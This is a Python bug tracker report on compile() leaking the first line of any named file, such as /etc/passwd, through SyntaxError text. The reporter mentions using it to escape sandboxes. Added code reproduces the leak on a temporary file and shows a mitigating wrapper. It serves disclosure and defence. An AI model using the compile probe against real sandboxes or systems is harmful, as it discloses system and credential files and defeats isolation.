New submission from Koh <[email protected]>:
By specifying a filename in the compile function and then improperly
terminating it, we are able to return the first line of any file.
>> compile('yield', '/etc/passwd', 'exec')
File "/etc/passwd", line 1
root:x:0:0:root:/root:/bin/bash
^
SyntaxError: 'yield' outside function
Is this intended behavior? I have been able to use it to escape sandboxes.
----------
messages: 357906
nosy: iso
priority: normal
severity: normal
status: open
title: `compile` returns the first line of file on termination
type: security
versions: Python 2.7, Python 3.5, Python 3.6, Python 3.7, Python 3.8, Python 3.9
_______________________________________
Python tracker <[email protected]>
<https://bugs.python.org/issue38985>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
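The mechanism behind the report is that when CPython raises a SyntaxError after parsing has finished (symtable or code-generation stage), it fills `SyntaxError.text` by opening the *filename* passed to `compile()` and reading that line from disk, rather than taking it from the source string. The following is an added example, not code from the report or from CPython: it reproduces the disclosure against a constructed temporary file standing in for /etc/passwd, and shows the mitigation a sandbox can apply (never forward a caller-controlled path to `compile()`, and strip `.text` from any SyntaxError before it reaches the caller). The names `PROBES`, `leak_first_line`, `safe_compile` and `demo` are this example's own.

```python
"""Reproduce the compile() file-disclosure from bpo-38985 against a
temporary file (so it runs offline) and show a sandbox-side mitigation.
Example code added for illustration; not part of the report or of CPython."""
import os
import tempfile

# Probe sources that parse cleanly but fail later in compilation.  Because
# the error is attached to the *filename*, CPython looks the offending line
# up on disk instead of in the source string we passed in.
PROBES = ("yield", "return", "break", "await x")


def leak_first_line(path):
    """Return the first line of `path` as disclosed through SyntaxError.text,
    or None if the interpreter did not read the file."""
    for probe in PROBES:
        try:
            compile(probe, path, "exec")
        except SyntaxError as exc:
            text = exc.text
            if text is None:
                continue
            text = text.rstrip("\r\n")
            if text != probe:  # line came from disk, not from our source
                return text
    return None


def safe_compile(source, filename="<sandbox>"):
    """Sandbox wrapper: refuse any filename that names a real path, and
    re-raise SyntaxError without its .text so on-disk data cannot ride
    back to the caller on the exception object."""
    if os.path.exists(filename):
        raise ValueError("filename must not name an existing path")
    try:
        return compile(source, filename, "exec")
    except SyntaxError as exc:
        scrubbed = SyntaxError(exc.msg, (filename, exc.lineno, exc.offset, None))
        raise scrubbed from None


def demo():
    """Write a constructed stand-in for /etc/passwd, leak its first line,
    then show that the wrapper yields no text.  Returns (leaked, blocked)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed sample data
        f.write("daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n")
        path = f.name
    try:
        leaked = leak_first_line(path)
        try:
            safe_compile("yield")
            blocked = "no error"
        except SyntaxError as exc:
            blocked = exc.text  # None: the wrapper scrubbed it
        return leaked, blocked
    finally:
        os.unlink(path)


if __name__ == "__main__":
    leaked, blocked = demo()
    print("leaked via SyntaxError.text:", leaked)
    print("text after scrubbing:", blocked)
```

The probe loop matters because which compilation stage reports a given error has moved between CPython releases; any probe whose `.text` differs from the probe source itself proves the line was fetched from the path. Note that scrubbing `.text` is only part of a fix: a sandbox must also stop the caller from choosing the filename in the first place, since the `.filename` and `.lineno` attributes, and any traceback formatting, can still cause the file to be opened.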